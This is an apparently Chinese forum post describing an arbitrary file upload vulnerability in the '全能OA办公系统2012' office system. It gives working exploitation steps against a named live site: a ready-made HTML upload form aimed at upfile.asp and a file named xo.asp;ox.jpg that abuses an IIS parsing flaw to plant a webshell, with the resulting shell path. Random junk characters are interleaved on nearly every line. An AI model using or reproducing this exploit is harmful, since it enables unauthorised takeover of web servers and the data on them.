全能OA办公系统 上传漏洞
7 h) {, Y3 L% `8 m# n4 Y( _! \+ m
系统介绍:
! m6 ?0 d& I8 _0 T8 y
N% e# J! ], p2 C: T全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
* g5 p" `- ?2 J: i, u# M! a
* N& N$ I" c. F7 g/ q7 }主要功能:; @5 O6 @; Y9 E& @
公司通告 # s% N8 ^ r9 x* |0 B
工作计划 9 b0 t+ |* l R
通讯助理 . ~% |# D9 d7 a4 y8 y% o8 ?+ J
客户资源 6 \. a; @# R1 Z6 X/ y2 f
我的公文
- E! J2 f" p+ N+ a Q& T5 s/ ?公文传阅
" H/ G& f/ l& u. L1 @5 Z+ s公共资源 1 }7 W; B; S5 x3 C t% t
资源预约 1 j7 c# Z6 ?; x% L0 v$ X8 w5 p5 [
今日考勤 % ~( }! Z6 A/ C8 X
个人计划
' ?( ^6 R; |& q& ]个人通讯录
5 o5 s+ S. u5 P" F4 u个人基本档案
7 \" B& z1 w# m" j未读邮件 . G% U' M. V3 j/ T7 g
发邮件 ; q% N) O3 Q }5 @4 T3 L
收件夹
! l/ D- R4 V# J0 u7 o- s8 n- C- m1 `寄件夹 : W8 e, Q5 E5 N5 {6 v! Z+ `
网络硬盘 + P1 L* X) C: v4 h" i3 {8 @
网络会议
- \# w) a8 p2 ]# k) u' [9 _网络调查
0 f5 [, y% p4 N" k' Z4 w# f2 y交流论坛0 S% }- y+ K+ y
R$ [: A; m: n; T7 i有兴趣测试的朋友可以下源码看看
+ s6 U6 b o6 S" o8 ^% s: X; A* J
( o5 @: Z/ E( d+ c% Q8 |源码下载:: `/ V4 e F3 m" H' `2 ?
( l) E- \% m- h9 L: r$ D! @: X* dhttp://www.mycodes.net/30/4750.htm5 i; ]7 [5 L4 e" }+ Q
# i+ Q, y/ t7 F8 w! i8 y9 ~漏洞介绍:
7 U0 i' T6 ~4 ~/ A1 Y2 \0 ]: G0 K( N. t2 K9 a- p
由upfile.asp上传文件漏洞引起
$ n; p4 v3 l' A8 H; i. I" M1 l' Z8 y% B% g, w6 K
测试方法:4 d0 T; _& j% g5 m0 ~
% h/ T2 @, M+ O2 H; O6 F: e使用名小子上传http://www.itlynn.com/upfile.asp即可
0 f" h- \6 M( A( O/ A3 F
" ?9 Q/ k2 G5 |6 E A }如果upfile.asp文件被删除不存在。. B! i3 S9 f. e/ X2 E
8 ?# q. v" y: T1 }& S' V# @ 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
3 g& ~: ]4 @; g. Q/ w* x9 ?0 P& U5 h) _: ^$ M: K4 O
如果存在那么将如下代码保存为upfile.html。
+ m4 ~9 z# {0 }1 V$ R: M+ {' I/ S: {
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
9 F t3 G& v2 h
5 G8 l2 z w' K% B$ `# ]9 N
; S1 X7 h" T, }/ h- P: a2 ^# n0 k7 Y5 r% ^# k$ ]: k. `
01 <table border='0' align="center" cellpadding="5">
# Y2 N1 B6 ^. {# u F' M+ N) O! E8 B
) u4 |" K2 o7 c: ?6 g {% m02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
a5 a" @! Q5 X) M' s, q
; ?- G9 Z) H2 e6 W03 <tr>
% N6 \6 B7 p& _# b+ _# n8 M9 F. @/ u$ _* f: G' o7 Q
04 <td>报错:</td> 1 n9 L* \9 |% y+ X2 K1 S/ T
! R) `" S9 I; H05 <td><input type='radio' name='errnumber' value='0'>
; N0 ?" q9 t1 k9 a8 ~
4 E* V& u T0 I4 i06 自动更名 3 K$ X- Q: j0 F+ j! C5 ]
# ~; ?1 i d) W7 ?
07 <input type='radio' name='errnumber' value='1' checked> * T( s& B1 H0 H: M/ N7 k
* ~, u9 i) L/ m4 j8 z% a
08 报错方式
) F% X. O! T1 b: C& E7 S2 Q; z/ B2 z
09 <input type='radio' name='errnumber' value='2'>
8 N6 g$ o% u9 g" P6 K( D. K) y5 U# C0 h9 Q
10 直接覆盖</td>
- Q% O8 Q* g( l, r# j: |) |
% n; B7 M D8 U& v$ q; V3 G11 </tr> - e# m3 m- N5 a9 y
& U) d. D( {7 b5 v
12 <tr>
5 h/ l1 t# y% I& W! G0 F! x& W5 U2 K# Y& k( u7 g6 z* U
13 <td>主题:</td> . A2 |( _5 [# g1 L& ?) G4 ?
/ q3 c! w" ~5 y$ [
14 <td><input type='text' name='filename' size='30'></td>
0 C; I: P' z1 X2 R/ t/ e8 D
9 q! A9 Q3 v2 }5 Y) U15 </tr>
- \7 S9 D3 g) V8 {( u) e6 @$ e$ k
: l8 D, n( N ?1 V16 <tr> . `! A2 F$ G8 D+ G
1 ~5 ?8 E/ d% n7 n17 <td>文件:</td>
% i, t8 _4 j& _- a
" C; e+ R! C9 b/ e8 C$ P% d1 r. s18 <td><input type="file"name="fruit"size="30"></td>
; t5 s& x9 N8 b. T2 d! S2 k! O( T+ B/ `! }1 i1 s4 u
19 </tr> ! T1 |% p* E k: L8 E8 H+ O
' N' l5 m3 a |) h
20 <tr>
' T+ A6 l; P4 P1 O2 Z( y# B2 M/ ~) }
21 <td valign='top'>简介:</td>
) y7 v& E" G) Y8 C4 T; h% `. x4 B1 W. |% f
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ) g( X. K+ e5 J. G/ [' H
5 O) B: y+ f2 v" ^7 |& n23 </tr> 8 n3 ~* k6 M3 G% D" A( S; j2 c0 _' U3 \
' E: _0 n. l+ {5 [, T, k24
8 Z3 [' B M3 x6 `1 u. Q- O
/ A9 O; @$ p+ s6 g& X2 c25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
, U3 n" z1 q9 {1 W1 \( L& I8 t! A- [3 Y7 V9 W, m
26 </tr> 1 z! o1 ]2 b. r1 e1 c: ~* {$ `8 Q
& t% M# G) p; E [
27 </form> ' L: g+ ]: T; Q4 x+ n _) ?! |5 u5 |
0 d. @# ?+ S+ R3 E w1 `7 p- L1 s2 \然后打开上传一个文件名为xo.asp;ox.jpg的文件。6 u4 b( G/ ?$ X6 W' e
, L1 B: e( s8 ` a/ q
]$ @* o6 n$ O2 i m% Y! t2 O* W
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
& x2 \$ h* `* w8 h* j M( h
# K- i% Z/ {* U6 Q% D; a此漏洞需要配合解析漏洞利用。7 M; N/ p' r8 l! p% p4 v# m8 Q9 M
* U: M7 M9 R) Q: N1 B) W |